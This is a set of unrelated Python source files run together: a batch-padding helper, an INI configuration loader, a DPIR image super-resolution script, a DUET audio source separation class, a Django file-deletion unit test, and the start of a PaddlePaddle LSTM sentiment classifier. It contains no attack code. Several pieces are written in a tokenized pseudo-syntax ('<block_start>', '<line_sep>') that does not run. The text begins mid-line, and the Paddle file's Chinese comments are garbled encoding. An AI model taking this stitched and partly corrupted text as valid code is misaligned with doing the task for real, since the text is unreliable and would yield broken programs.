desired_batch_size<block_start>"""Expand batch to desired size by repeating last slice."""<line_sep>batch_pad=desired_batch_size-x.shape[0]<line_sep><return>np.concatenate([x np.tile(x[-1] (batch_pad 1))] axis=0)<block_end><def_stmt>tohost x<block_start>"""Collect batches from all devices to host and flatten batch dimensions."""<line_sep>n_device,n_batch,*remaining_dims=x.shape<line_sep><return>np.array(x).reshape((n_device<times>n_batch )+tuple(remaining_dims))<block_end> |
# Lazily-parsed INI configuration support for the plugin.
# NOTE(review): this module targets Python 2 (py2 `ConfigParser` module name,
# `ex.message`, old-style `__metaclass__`) -- confirm the runtime before
# porting any of it.
from plugin.core.environment import Environment

from ConfigParser import NoOptionError, NoSectionError, ParsingError, SafeConfigParser

import logging
import os

log = logging.getLogger(__name__)

# Base names (without ".ini") of the configuration files that
# `ConfigurationMeta` exposes as attributes on `Configuration`.
CONFIGURATION_FILES = ['advanced']


class ConfigurationFile(object):
    """A single INI configuration file, parsed lazily on first access."""

    def __init__(self, path):
        self._path = path
        # Path relative to the plug-in support directory, used only for logging.
        self._relpath = os.path.relpath(self._path, Environment.path.plugin_support)

        self._parser = None   # SafeConfigParser once successfully loaded
        self._error = False   # True after a failed parse; suppresses retries

    def __getitem__(self, section):
        """Return a `ConfigurationSection` view of `section`."""
        # Ensure file is loaded
        self.load()

        # Construct section
        return ConfigurationSection(self._parser, section)

    def load(self):
        """Parse the file once; on failure, log and mark the file as errored."""
        if self._parser or self._error:
            return

        log.debug('Parsing configuration file: %r', self._relpath)

        try:
            self._parser = SafeConfigParser()
            self._parser.read(self._path)
        except ParsingError as ex:
            # Malformed file: remember the failure so we don't re-parse on
            # every access.  (`ex.message` is Python 2 only.)
            log.info(ex.message)

            self._parser = None
            self._error = True
        except Exception as ex:
            log.warn('Unable to parse configuration file: %r - %s', self._relpath, ex, exc_info=True)

            self._parser = None
            self._error = True


class ConfigurationSection(object):
    """Read/write view of one section of a parsed configuration file."""

    def __init__(self, parser, name):
        self._parser = parser   # may be None if the file failed to parse
        self._name = name

    def _get(self, func, key, default=None):
        # Fetch `key` via the parser method named `func` ('get', 'getint',
        # ...), falling back to `default` when the parser is missing or the
        # option does not exist.
        if not self._parser:
            return default

        if not self._parser.has_option(self._name, key):
            return default

        try:
            return getattr(self._parser, func)(self._name, key)
        except (NoSectionError, NoOptionError):
            return default

    def get(self, key, default=None):
        """Return the raw string value of `key`, or `default`."""
        return self._get('get', key, default)

    def get_int(self, key, default=None):
        """Return `key` coerced to int, or `default`."""
        return self._get('getint', key, default)

    def get_float(self, key, default=None):
        """Return `key` coerced to float, or `default`."""
        return self._get('getfloat', key, default)

    def get_boolean(self, key, default=None):
        """Return `key` coerced to bool, or `default`."""
        return self._get('getboolean', key, default)

    def __getitem__(self, key):
        # Unlike `get`, this propagates parser exceptions for a missing option.
        if not self._parser:
            return None

        return self._parser.get(self._name, key)

    def __setitem__(self, key, value):
        # Silently ignored when the file never parsed.
        if not self._parser:
            return

        self._parser.set(self._name, key, value)


class ConfigurationMeta(type):
    """Metaclass that attaches one `ConfigurationFile` per entry in
    `CONFIGURATION_FILES` as a class attribute on the class being created."""

    def __new__(cls, name, parents, dct):
        # Load configuration files.
        # Bug fix: the loop previously reused `name` as its loop variable,
        # shadowing the class-name argument, so the created class's __name__
        # became the last configuration file name (e.g. 'advanced') instead
        # of the declared class name.
        for file_name in CONFIGURATION_FILES:
            # Build path
            path = os.path.join(Environment.path.plugin_data, '%s.ini' % file_name)

            # Parse configuration file
            dct[file_name] = ConfigurationFile(path)

        # Construct object
        return super(ConfigurationMeta, cls).__new__(cls, name, parents, dct)


class Configuration(object):
    # NOTE(review): `__metaclass__` is Python 2 syntax; it has no effect on
    # Python 3, where this would need `class Configuration(metaclass=...)`.
    __metaclass__ = ConfigurationMeta

    advanced = None   # replaced with a ConfigurationFile by ConfigurationMeta
import os.path
import glob
import cv2
import logging
import time
import numpy as np
from datetime import datetime
from collections import OrderedDict
import hdf5storage
import torch

from utils import utils_deblur
from utils import utils_logger
from utils import utils_model
from utils import utils_pnp as pnp
from utils import utils_sisr as sr
from utils import utils_image as util

"""
Spyder (Python 3.7)
PyTorch 1.6.0
Windows 10 or Linux
<NAME> (<EMAIL>)
github: https://github.com/cszn/DPIR
        https://github.com/cszn/IRCNN
        https://github.com/cszn/KAIR
@article{zhang2020plug,
  title={Plug-and-Play Image Restoration with Deep Denoiser Prior},
  author={<NAME>, <NAME>, <NAME>, <NAME>, <NAME>},
  journal={arXiv preprint},
  year={2020}
}
% If you have any question, please feel free to contact with me.
% <NAME> (e-mail: <EMAIL>; homepage: https://cszn.github.io/)
by <NAME> (01/August/2020)
# --------------------------------------------
|--model_zoo             # model_zoo
   |--drunet_gray        # model_name, for grayscale images
   |--drunet_color       # model_name, for color images
|--testset               # testsets
|--results               # results
# --------------------------------------------
"""


def main():
    """Plug-and-play single-image super-resolution with a deep denoiser prior.

    Runs the DPIR half-quadratic-splitting loop on every image in the chosen
    test set: alternates a closed-form FFT data sub-problem with a CNN
    denoiser prior step, then saves the upscaled result.

    In real applications, you should set proper
      - "noise_level_img": from [3, 25]; set 3 for clean images, try 15 for
        very noisy LR images;
      - "k" (or "kernel_width"): the blur kernel is very important!
        kernel_width from [0.6, 3.0] to get the best performance.
    """
    ##############################################################################
    testset_name = 'Set3C'        # test set folder under `testsets`, 'set5' | 'srbsd68'
    noise_level_img = 3           # noise level of image, from [3, 25]; 3 for clean images
    model_name = 'drunet_color'   # 'drunet_gray' | 'drunet_color' | 'ircnn_gray' | 'ircnn_color'
    sf = 2                        # scale factor: 1, 2, 3 or 4
    iter_num = 24                 # number of HQS iterations, default 24 for SISR

    # --------------------------------
    # set blur kernel
    # --------------------------------
    kernel_width_default_x1234 = [0.6, 0.9, 1.7, 2.2]   # Gaussian kernel widths for x1..x4
    noise_level_model = noise_level_img / 255.          # noise level as seen by the model
    kernel_width = kernel_width_default_x1234[sf - 1]
    # Set your own kernel width here if the default does not match the data!
    # kernel_width = 1.0
    k = utils_deblur.fspecial('gaussian', 25, kernel_width)
    k = sr.shift_pixel(k, sf)     # shift the kernel
    k /= np.sum(k)                # normalize to unit mass
    ##############################################################################

    show_img = False
    if show_img:
        util.surf(k)
    x8 = True                     # x8 self-ensemble to boost performance (default: False)
    modelSigma1 = 49              # sigma_1 of the denoiser schedule, default 49
    modelSigma2 = max(sf, noise_level_model * 255.)
    classical_degradation = True  # classical (blur+downsample) vs bicubic degradation
    task_current = 'sr'           # 'sr' for super-resolution
    n_channels = 1 if 'gray' in model_name else 3   # fixed
    model_zoo = 'model_zoo'       # fixed
    testsets = 'testsets'         # fixed
    results = 'results'           # fixed
    result_name = testset_name + '_realapplications_' + task_current + '_' + model_name
    model_path = os.path.join(model_zoo, model_name + '.pth')
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    torch.cuda.empty_cache()

    # ----------------------------------------
    # L_path, E_path
    # ----------------------------------------
    L_path = os.path.join(testsets, testset_name)   # L_path, for low-quality images
    E_path = os.path.join(results, result_name)     # E_path, for estimated images
    util.mkdir(E_path)

    logger_name = result_name
    utils_logger.logger_info(logger_name, log_path=os.path.join(E_path, logger_name + '.log'))
    logger = logging.getLogger(logger_name)

    # ----------------------------------------
    # load model
    # ----------------------------------------
    if 'drunet' in model_name:
        from models.network_unet import UNetRes as net
        model = net(in_nc=n_channels + 1, out_nc=n_channels, nc=[64, 128, 256, 512],
                    nb=4, act_mode='R', downsample_mode="strideconv",
                    upsample_mode="convtranspose")
        model.load_state_dict(torch.load(model_path), strict=True)
        model.eval()
        for _, v in model.named_parameters():
            v.requires_grad = False
        model = model.to(device)
    elif 'ircnn' in model_name:
        from models.network_dncnn import IRCNN as net
        model = net(in_nc=n_channels, out_nc=n_channels, nc=64)
        model25 = torch.load(model_path)   # bundle of 25 denoisers, one per noise bucket
        former_idx = 0

    logger.info('model_name:{}, image sigma:{:.3f}, model sigma:{:.3f}'.format(
        model_name, noise_level_img, noise_level_model))
    logger.info('Model path: {:s}'.format(model_path))
    logger.info(L_path)
    L_paths = util.get_image_paths(L_path)

    for idx, img in enumerate(L_paths):

        # --------------------------------
        # (1) get img_L
        # --------------------------------
        logger.info('Model path: {:s} Image: {:s}'.format(model_path, img))
        img_name, ext = os.path.splitext(os.path.basename(img))
        img_L = util.imread_uint(img, n_channels=n_channels)
        img_L = util.uint2single(img_L)
        img_L = util.modcrop(img_L, 8)   # crop so dimensions are multiples of 8

        # --------------------------------
        # (2) get rhos and sigmas
        # --------------------------------
        rhos, sigmas = pnp.get_rho_sigma(sigma=max(0.255 / 255., noise_level_model),
                                         iter_num=iter_num, modelSigma1=modelSigma1,
                                         modelSigma2=modelSigma2, w=1)
        rhos, sigmas = torch.tensor(rhos).to(device), torch.tensor(sigmas).to(device)

        # --------------------------------
        # (3) initialize x, and pre-calculation
        # --------------------------------
        x = cv2.resize(img_L, (img_L.shape[1] * sf, img_L.shape[0] * sf),
                       interpolation=cv2.INTER_CUBIC)
        if np.ndim(x) == 2:
            x = x[..., None]
        if classical_degradation:
            x = sr.shift_pixel(x, sf)
        x = util.single2tensor4(x).to(device)

        img_L_tensor, k_tensor = util.single2tensor4(img_L), util.single2tensor4(np.expand_dims(k, 2))
        [k_tensor, img_L_tensor] = util.todevice([k_tensor, img_L_tensor], device)
        FB, FBC, F2B, FBFy = sr.pre_calculate(img_L_tensor, k_tensor, sf)

        # --------------------------------
        # (4) main iterations
        # --------------------------------
        for i in range(iter_num):

            print('Iter: {} / {}'.format(i, iter_num))

            # --------------------------------
            # step 1, FFT: closed-form data sub-problem
            # --------------------------------
            tau = rhos[i].float().repeat(1, 1, 1, 1)
            x = sr.data_solution(x, FB, FBC, F2B, FBFy, tau, sf)

            if 'ircnn' in model_name:
                # Pick the IRCNN denoiser matching the current sigma.
                # Bug fix: `np.int` was deprecated in NumPy 1.20 and removed
                # in NumPy 1.24; the builtin `int` is the correct replacement.
                current_idx = int(np.ceil(sigmas[i].cpu().numpy() * 255. / 2.) - 1)

                if current_idx != former_idx:
                    model.load_state_dict(model25[str(current_idx)], strict=True)
                    model.eval()
                    for _, v in model.named_parameters():
                        v.requires_grad = False
                    model = model.to(device)
                former_idx = current_idx

            # --------------------------------
            # step 2, denoiser prior
            # --------------------------------
            if x8:
                x = util.augment_img_tensor4(x, i % 8)

            if 'drunet' in model_name:
                x = torch.cat((x, sigmas[i].repeat(1, 1, x.shape[2], x.shape[3])), dim=1)
                x = utils_model.test_mode(model, x, mode=2, refield=64, min_size=256, modulo=16)
            elif 'ircnn' in model_name:
                x = model(x)

            if x8:
                # Undo the self-ensemble augmentation (modes 3 and 5 are their
                # own inverses' counterparts).
                if i % 8 == 3 or i % 8 == 5:
                    x = util.augment_img_tensor4(x, 8 - i % 8)
                else:
                    x = util.augment_img_tensor4(x, i % 8)

        # --------------------------------
        # (5) img_E
        # --------------------------------
        img_E = util.tensor2uint(x)
        util.imsave(img_E, os.path.join(E_path, img_name + '_x' + str(sf) + '_' + model_name + '.png'))


if __name__ == '__main__':
    main()
import numpy as np
from scipy import signal

from .. import MaskSeparationBase
from ...core import utils
from ...core import constants


class Duet(MaskSeparationBase):
    """
    The DUET algorithm was originally proposed by S.Rickard and F.Dietrich for DOA
    estimation and further developed for BSS and demixing by <NAME>, S.Rickard,
    and <NAME>.

    DUET extracts sources using the symmetric attenuation and relative delay between
    two channels. The symmetric attenuation is calculated from the ratio of the two
    channels' stft amplitudes, and the delay is the arrival delay between the two
    sensors used to record the audio signal. These two values are clustered as peaks on
    a histogram to determine where each source occurs. This implementation of DUET
    creates and returns Mask objects after the run() function, which can then be
    applied to the original audio signal to extract each individual source.

    References:
        [1] Rickard, Scott. "The DUET blind source separation algorithm."
            Blind Speech Separation. Springer Netherlands, 2007. 217-241.
        [2] Yilmaz, Ozgur, and <NAME>. "Blind separation of speech mixtures
            via time-frequency masking."
            Signal Processing, IEEE transactions on 52.7 (2004): 1830-1847.

    Args:
        input_audio_signal (np.array): a 2-row Numpy matrix containing samples of the
            two-channel mixture.
        num_sources (int): Number of sources to find.
        attenuation_min (int): Minimum distance in utils.find_peak_indices, change if
            not enough peaks are identified.
        attenuation_max (int): Used for creating a histogram without outliers.
        num_attenuation_bins (int): Number of bins for attenuation.
        delay_min (int): Lower bound on delay, used as minimum distance in
            utils.find_peak_indices.
        delay_max (int): Upper bound on delay, used for creating a histogram without
            outliers.
        num_delay_bins (int): Number of bins for delay.
        peak_threshold (float): Value in [0, 1] for peak picking.
        attenuation_min_distance (int): Minimum distance between peaks wrt attenuation.
        delay_min_distance (int): Minimum distance between peaks wrt delay.
        p (int): Weight the histogram with the symmetric attenuation estimator.
        q (int): Weight the histogram with the delay estimator.

    Notes:
        On page 8 of his paper, Rickard recommends p=1 and q=0 as a default starting
        point and p=.5, q=0 if one source is more dominant.

    Attributes:
        stft_ch0 (np.array): A Numpy matrix containing the stft data of channel 0.
        stft_ch1 (np.array): A Numpy matrix containing the stft data of channel 1.
        frequency_matrix (np.array): A Numpy matrix containing the frequencies of
            analysis.
        symmetric_atn (np.array): A Numpy matrix containing the symmetric attenuation
            between the two channels.
        delay (np.array): A Numpy matrix containing the delay between the two channels.
        num_time_bins (np.array): The number of time bins for the frequency matrix and
            mask arrays.
        num_frequency_bins (int): The number of frequency bins for the mask arrays.
        attenuation_bins (int): A Numpy array containing the attenuation bins for the
            histogram.
        delay_bins (np.array): A Numpy array containing the delay bins for the histogram.
        normalized_attenuation_delay_histogram (np.array): A normalized Numpy matrix
            containing the attenuation delay histogram, which has peaks for each source.
        attenuation_delay_histogram (np.array): A non-normalized Numpy matrix containing
            the attenuation delay histogram, which has peaks for each source.
        peak_indices (np.array): A Numpy array containing the indices of the peaks for
            the histogram.
        separated_sources (np.array): A Numpy array of arrays containing each
            separated source.
    """

    def __init__(self, input_audio_signal, num_sources,
                 attenuation_min=-3, attenuation_max=3, num_attenuation_bins=50,
                 delay_min=-3, delay_max=3, num_delay_bins=50,
                 peak_threshold=0.0, attenuation_min_distance=5, delay_min_distance=5,
                 p=1, q=0, mask_type='binary'):
        super().__init__(input_audio_signal=input_audio_signal, mask_type=mask_type)

        # Clustering / histogram configuration (see class docstring).
        self.num_sources = num_sources
        self.attenuation_min = attenuation_min
        self.attenuation_max = attenuation_max
        self.num_attenuation_bins = num_attenuation_bins
        self.delay_min = delay_min
        self.delay_max = delay_max
        self.num_delay_bins = num_delay_bins
        self.peak_threshold = peak_threshold
        self.attenuation_min_distance = attenuation_min_distance
        self.delay_min_distance = delay_min_distance
        self.p = p
        self.q = q

        # Intermediate results, populated by run().
        self.stft_ch0 = None
        self.stft_ch1 = None
        self.frequency_matrix = None
        self.symmetric_atn = None
        self.delay = None
        self.num_time_bins = None
        self.num_frequency_bins = None
        self.attenuation_bins = None
        self.delay_bins = None
        self.normalized_attenuation_delay_histogram = None
        self.attenuation_delay_histogram = None
        self.peak_indices = None
        self.delay_peak = None
        self.atn_peak = None
        self.separated_sources = None

    def run(self):
        """ Extracts N sources from a given stereo audio mixture (N sources captured via 2 sensors)

        Returns:
            computed_masks (np.array): A list of binary mask objects that can be used to extract the sources

        Example:
            .. code-block:: python
                :linenos:

                # Import input audio signal
                input_file_name = '../Input/dev1_female3_inst_mix.wav'
                signal = AudioSignal(path_to_input_file=input_file_name)

                # Set up and run Duet
                duet = Duet(signal, a_min=-3, a_max=3, a_num=50, d_min=-3, d_max=3, d_num=50, threshold=0.2,
                            a_min_distance=5, d_min_distance=5, num_sources=3)
                duet.run()

                # plot histogram results
                duet.plot(os.path.join('..', 'Output', 'duet_2d.png'))
                duet.plot(os.path.join('..', 'Output', 'duet_3d.png'), three_d_plot=True)

                # Create output file for each source found
                output_name_stem = os.path.join('..', 'Output', 'duet_source')
                i = 1
                for s in duet.make_audio_signals():
                    output_file_name = f"{output_name_stem}{i}.wav"
                    s.write_audio_to_file(output_file_name)
                    i += 1
        """
        self.result_masks = []
        # Calculate the stft of both channels and create the frequency matrix (the matrix containing the
        # frequencies of analysis of the Fourier transform)
        self.stft_ch0, self.stft_ch1, self.frequency_matrix = self._compute_spectrogram(self.sample_rate)

        # Calculate the symmetric attenuation (alpha) and delay (delta) for each
        # time-freq. point and return a matrix for each
        self.symmetric_atn, self.delay = self._compute_atn_delay(
            self.stft_ch0, self.stft_ch1, self.frequency_matrix)

        # Make histogram of attenuation-delay values and get the center values for the bins in this histogram
        self.normalized_attenuation_delay_histogram, self.attenuation_bins, self.delay_bins = (
            self._make_histogram())

        # Find the location of peaks in the attenuation-delay plane
        self.peak_indices = utils.find_peak_indices(
            self.normalized_attenuation_delay_histogram, self.num_sources,
            threshold=self.peak_threshold,
            min_dist=[self.attenuation_min_distance, self.delay_min_distance])

        # compute delay_peak, attenuation peak, and attenuation/delay estimates
        self.delay_peak, atn_delay_est, self.atn_peak = self._convert_peaks(self.peak_indices)

        # compute masks for separation
        computed_masks = self._compute_masks()

        return computed_masks

    def _compute_spectrogram(self, sample_rate):
        """ Creates the STFT matrices for channel 0 and 1, and computes the frequency matrix.

        Parameter:
            sample_rate (integer): sample rate

        Returns:
            stft_ch0 (np.matrix): a 2D Numpy matrix containing the stft of channel 0
            stft_ch1 (np.matrix): a 2D Numpy matrix containing the stft of channel 1
            wmat (np.matrix): a 2D Numpy matrix containing the frequencies of analysis of the Fourier transform
        """
        # Compute the stft of the two channel mixtures
        self.audio_signal.stft_params = self.stft_params
        self.audio_signal.stft()

        stft_ch0 = self.audio_signal.get_stft_channel(0)
        stft_ch1 = self.audio_signal.get_stft_channel(1)

        # Compute the freq. matrix for later use in phase calculations
        n_time_bins = len(self.audio_signal.time_bins_vector)
        # NOTE(review): `np.mat` is deprecated and removed in NumPy 2.0; here it
        # is only used to get a column vector before tiling -- verify before a
        # NumPy upgrade.
        wmat = np.array(np.tile(np.mat(self.audio_signal.freq_vector).T,
                                (1, n_time_bins))) * (2 * np.pi / sample_rate)
        # Small offset avoids division by zero in the delay computation.
        wmat += constants.EPSILON

        return stft_ch0, stft_ch1, wmat

    @staticmethod
    def _compute_atn_delay(stft_ch0, stft_ch1, frequency_matrix):
        # Calculate the symmetric attenuation (alpha) and delay (delta) for each
        # time-freq. point
        inter_channel_ratio = (stft_ch1 + constants.EPSILON) / (stft_ch0 + constants.EPSILON)
        attenuation = np.abs(inter_channel_ratio)  # relative attenuation between the two channels
        symmetric_attenuation = attenuation - 1 / attenuation  # symmetric attenuation
        relative_delay = -np.imag(np.log(inter_channel_ratio)) / (2 * np.pi * frequency_matrix)  # relative delay
        return symmetric_attenuation, relative_delay

    def _make_histogram(self):
        """Receives the stft of the two channel mixtures and the frequency matrix to a create
        a smooth and normalized histogram.

        Parameters:
            stft_ch0 (complex np.array): a 2D Numpy matrix containing the stft of channel 0
            stft_ch1 (complex np.array): a 2D Numpy matrix containing the stft of channel 1
            symmetric_atn (np.array): the symmetric attenuation between two channels
            delay (np.array): the time delay between 2 channels
            wmat (np.array): a 2D Numpy matrix containing the frequency matrix of the signal

        Returns:
            histogram (np.array): a smooth and normalized histogram
            atn_bins (np.array): The range of attenuation values distributed into bins
            delay_bins (np.array): The range of delay values distributed into bins
        """
        # calculate the weighted histogram; p and q weight each time-freq. point
        # by channel magnitude and frequency respectively (Rickard's estimator)
        time_frequency_weights = (np.abs(self.stft_ch0) * np.abs(self.stft_ch1)) ** self.p * \
                                 (np.abs(self.frequency_matrix)) ** self.q

        # only consider time-freq. points yielding estimates in bounds
        attenuation_premask = np.logical_and(self.attenuation_min < self.symmetric_atn,
                                             self.symmetric_atn < self.attenuation_max)
        delay_premask = np.logical_and(self.delay_min < self.delay, self.delay < self.delay_max)
        attenuation_delay_premask = np.logical_and(attenuation_premask, delay_premask)

        nonzero_premask = np.nonzero(attenuation_delay_premask)
        symmetric_attenuation_vector = self.symmetric_atn[nonzero_premask]
        delay_vector = self.delay[nonzero_premask]
        time_frequency_weights_vector = time_frequency_weights[nonzero_premask]

        bins_array = np.array([self.num_attenuation_bins, self.num_delay_bins])
        range_array = np.array([[self.attenuation_min, self.attenuation_max],
                                [self.delay_min, self.delay_max]])

        # compute the histogram
        histogram, atn_bins, delay_bins = np.histogram2d(
            symmetric_attenuation_vector, delay_vector,
            bins=bins_array, range=range_array, weights=time_frequency_weights_vector)

        # Save non-normalized as an option for plotting later
        self.attenuation_delay_histogram = histogram

        # Scale histogram from 0 to 1
        histogram /= histogram.max()

        # smooth the normalized histogram - local average 3-by-3 neighboring bins
        histogram = self._smooth_matrix(histogram, np.array([3]))

        return histogram, atn_bins, delay_bins

    def _convert_peaks(self, peak_indices):
        """Receives the attenuation and delay bins and computes the delay/attenuation
        peaks based on the peak finder indices.

        Returns:
            delay_peak (np.array): The delay peaks determined from the histogram
            atn_delay_est (np.array): The estimated symmetric attenuation and delay values
            atn_peak (np.array): Attenuation converted from symmetric attenuation
        """
        atn_indices = [x[0] for x in peak_indices]
        delay_indices = [x[1] for x in peak_indices]
        symmetric_atn_peak = self.attenuation_bins[atn_indices]
        delay_peak = self.delay_bins[delay_indices]

        atn_delay_est = np.column_stack((symmetric_atn_peak, delay_peak))

        # convert symmetric_atn to atn_peak using formula from Rickard
        atn_peak = (symmetric_atn_peak + np.sqrt(symmetric_atn_peak ** 2 + 4)) / 2
        return delay_peak, atn_delay_est, atn_peak

    def _compute_masks(self):
        """Receives the attenuation and delay peaks and computes a mask to be applied to the signal for source
        separation.
        """
        # compute masks for separation: assign each time-freq. point to the
        # peak (source) whose attenuation/delay model fits it best so far
        best_so_far = np.inf * np.ones_like(self.stft_ch0, dtype=float)

        for i in range(0, self.num_sources):
            mask_array = np.zeros_like(self.stft_ch0, dtype=bool)
            phase = np.exp(-1j * self.frequency_matrix * self.delay_peak[i])
            # Likelihood-style score: smaller means this source explains the
            # time-freq. point better (Rickard's ML mask criterion).
            score = np.abs(self.atn_peak[i] * phase * self.stft_ch0 - self.stft_ch1) ** 2 / \
                    (1 + self.atn_peak[i] ** 2)
            mask = (score < best_so_far)
            mask_array[mask] = True
            background_mask = self.mask_type(np.array(mask_array))
            self.result_masks.append(background_mask)
            # Accumulate (via XOR) every later mask into mask 0 so it can be
            # inverted below into "whatever no other source claimed".
            self.result_masks[0].mask = np.logical_xor(self.result_masks[i].mask,
                                                       self.result_masks[0].mask)
            best_so_far[mask] = score[mask]

        # Compute first mask based on what the other masks left remaining
        self.result_masks[0].mask = np.logical_not(self.result_masks[0].mask)
        return self.result_masks

    @staticmethod
    def _smooth_matrix(matrix, kernel):
        """Performs two-dimensional convolution in order to smooth the values of matrix elements.
        (similar to low-pass filtering)

        Parameters:
            matrix (np.array): a 2D Numpy matrix to be smoothed
            kernel (np.array): a 2D Numpy matrix containing kernel values

        Note:
            if Kernel is of size 1 by 1 (scalar), a Kernel by Kernel matrix of 1/Kernel**2 will be used as the matrix
            averaging kernel

        Output:
            smoothed_matrix (np.array): a 2D Numpy matrix containing a smoothed version of Mat (same size as Mat)
        """
        # check the dimensions of the Kernel matrix and set the values of the averaging
        # matrix, kernel_matrix
        kernel_matrix = np.ones((kernel[0], kernel[0])) / kernel[0] ** 2
        krow, kcol = np.shape(kernel_matrix)

        # adjust the matrix dimension for convolution
        copy_row = int(np.floor(krow / 2))  # number of rows to copy on top and bottom
        copy_col = int(np.floor(kcol / 2))  # number of columns to copy on either side

        # TODO: This is very ugly. Make this readable.
        # form the augmented matrix (rows and columns added to top, bottom, and sides)
        # NOTE(review): `np.mat` (np.matrix) is deprecated and removed in NumPy
        # 2.0.  The padding construction below relies on np.matrix semantics
        # (`*` is matrix multiplication, slices stay 2-D), so a port to plain
        # ndarrays needs explicit reshapes -- do not mechanically replace.
        matrix = np.mat(matrix)  # make sure Mat is a Numpy matrix
        # NOTE(review): `matrix[-1, 1]` for the bottom-left corner looks like it
        # should be `matrix[-1, 0]` by symmetry with the other corners -- verify.
        augmented_matrix = np.vstack([
            np.hstack([matrix[0, 0] * np.ones((copy_row, copy_col)),
                       np.ones((copy_row, 1)) * matrix[0, :],
                       matrix[0, -1] * np.ones((copy_row, copy_col))]),
            np.hstack([matrix[:, 0] * np.ones((1, copy_col)),
                       matrix,
                       matrix[:, -1] * np.ones((1, copy_col))]),
            np.hstack([matrix[-1, 1] * np.ones((copy_row, copy_col)),
                       np.ones((copy_row, 1)) * matrix[-1, :],
                       matrix[-1, -1] * np.ones((copy_row, copy_col))])])

        # perform two-dimensional convolution between the input matrix and the kernel
        smooted_matrix = signal.convolve2d(augmented_matrix, kernel_matrix[::-1, ::-1], mode='valid')

        return smooted_matrix
<import_from_future_stmt> unicode_literals<import_stmt>os<import_stmt>django<import_from_stmt>django.test TestCase<import_from_stmt>mock call patch<import_from_stmt>storage.brokers.host_broker HostBroker<import_from_stmt>storage.delete_files_job delete_files<import_from_stmt>storage.test utils<as>storage_test_utils<class_stmt>TestDeleteFiles(TestCase)<block_start><def_stmt>setUp self<block_start>django.setup()<line_sep>self.broker=HostBroker()<line_sep>self.broker.load_configuration({'type':HostBroker().broker_type 'host_path':'/host/path'})<block_end>@patch('storage.brokers.host_broker.os.path.exists')@patch('storage.brokers.host_broker.os.remove')<def_stmt>test_delete_file self mock_remove mock_exists<block_start>"""Tests removing a file"""<def_stmt>new_exists path<block_start><return><true><block_end>mock_exists.side_effect=new_exists<line_sep>volume_path=os.path.join('the' 'volume' 'path')<line_sep>file_path_1=os.path.join('my_dir' 'my_file.txt')<line_sep>file_path_2=os.path.join('my_dir' 'my_file.json')<line_sep>full_path_file_1=os.path.join(volume_path file_path_1)<line_sep>full_path_file_2=os.path.join(volume_path file_path_2)<line_sep>file_1=storage_test_utils.create_file(file_path=file_path_1)<line_sep>file_2=storage_test_utils.create_file(file_path=file_path_2)<line_sep># Call function
test_1=delete_files([file_1] volume_path self.broker)<line_sep>self.assertEqual(test_1 <none>)<line_sep>test_2=delete_files([file_2] volume_path self.broker)<line_sep>self.assertEqual(test_2 <none>)<line_sep># Check results
two_calls=[call(full_path_file_1) call(full_path_file_2)]<line_sep>mock_remove.assert_has_calls(two_calls)<block_end><block_end> |
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>paddle<import_stmt>paddle.nn.functional<as>F<import_from_stmt>paddle.nn LSTM Embedding Dropout Linear<import_stmt>numpy<as>np<class_stmt>SentimentClassifier(paddle.nn.Layer)<block_start><def_stmt>__init__ self hidden_size vocab_size class_num=2 num_steps=128 num_layers=1 init_scale=0.1 dropout=<none># ๅๆฐๅซไนๅฆไธ๏ผ
# 1.hidden_size๏ผ่กจ็คบembedding-size๏ผhiddenๅcellๅ้็็ปดๅบฆ
# 2.vocab_size๏ผๆจกๅๅฏไปฅ่่็่ฏ่กจๅคงๅฐ
# 3.class_num๏ผๆ
ๆ็ฑปๅไธชๆฐ๏ผๅฏไปฅๆฏ2ๅ็ฑป๏ผไนๅฏไปฅๆฏๅคๅ็ฑป
# 4.num_steps๏ผ่กจ็คบ่ฟไธชๆ
ๆๅๆๆจกๅๆๅคงๅฏไปฅ่่็ๅฅๅญ้ฟๅบฆ
# 5.num_layers๏ผ่กจ็คบ็ฝ็ป็ๅฑๆฐ
# 6.init_scale๏ผ่กจ็คบ็ฝ็ปๅ
้จ็ๅๆฐ็ๅๅงๅ่ๅด
# ้ฟ็ญๆถ่ฎฐๅฟ็ฝ็ปๅ
้จ็จไบๅพๅคTanh๏ผSigmoid็ญๆฟๆดปๅฝๆฐ๏ผ่ฟไบๅฝๆฐๅฏนๆฐๅผ็ฒพๅบฆ้ๅธธๆๆ๏ผ
# ๅ ๆญคๆไปฌไธ่ฌๅชไฝฟ็จๆฏ่พๅฐ็ๅๅงๅ่ๅด๏ผไปฅไฟ่ฏๆๆ
<block_start>super(SentimentClassifier self).__init__()<line_sep>self.hidden_size=hidden_size<line_sep>self.vocab_size=vocab_size<line_sep>self.class_num=class_num<line_sep>self.init_scale=init_scale<line_sep>self.num_layers=num_layers<line_sep>self.num_steps=num_steps<line_sep>self.dropout=dropout<line_sep># ๅฃฐๆไธไธชLSTMๆจกๅ๏ผ็จๆฅๆๆฏไธชๅฅๅญๆฝ่ฑกๆๅ้
self.simple_lstm_rnn=LSTM(input_size=hidden_size hidden_size=hidden_size num_layers=num_layers)<line_sep># ๅฃฐๆไธไธชembeddingๅฑ๏ผ็จๆฅๆๅฅๅญไธญ็ๆฏไธช่ฏ่ฝฌๆขไธบๅ้
self.embedding=Embedding(num_embeddings=vocab_size embedding_dim=hidden_size sparse=<false> weight_attr=paddle.ParamAttr(initializer=paddle.nn.initializer.Uniform(low=-init_scale high=init_scale)))<line_sep># ๅจๅพๅฐไธไธชๅฅๅญ็ๅ้่กจ็คบๅ๏ผ้่ฆๆ นๆฎ่ฟไธชๅ้่กจ็คบๅฏน่ฟไธชๅฅๅญ่ฟ่กๅ็ฑป
# ไธ่ฌๆฅ่ฏด๏ผๅฏไปฅๆ่ฟไธชๅฅๅญ็ๅ้่กจ็คบไนไปฅไธไธชๅคงๅฐไธบ[self.hidden_size, self.class_num]็Wๅๆฐ๏ผ
# ๅนถๅ ไธไธไธชๅคงๅฐไธบ[self.class_num]็bๅๆฐ๏ผไป่่พพๅฐๆๅฅๅญๅ้ๆ ๅฐๅฐๅ็ฑป็ปๆ็็ฎ็
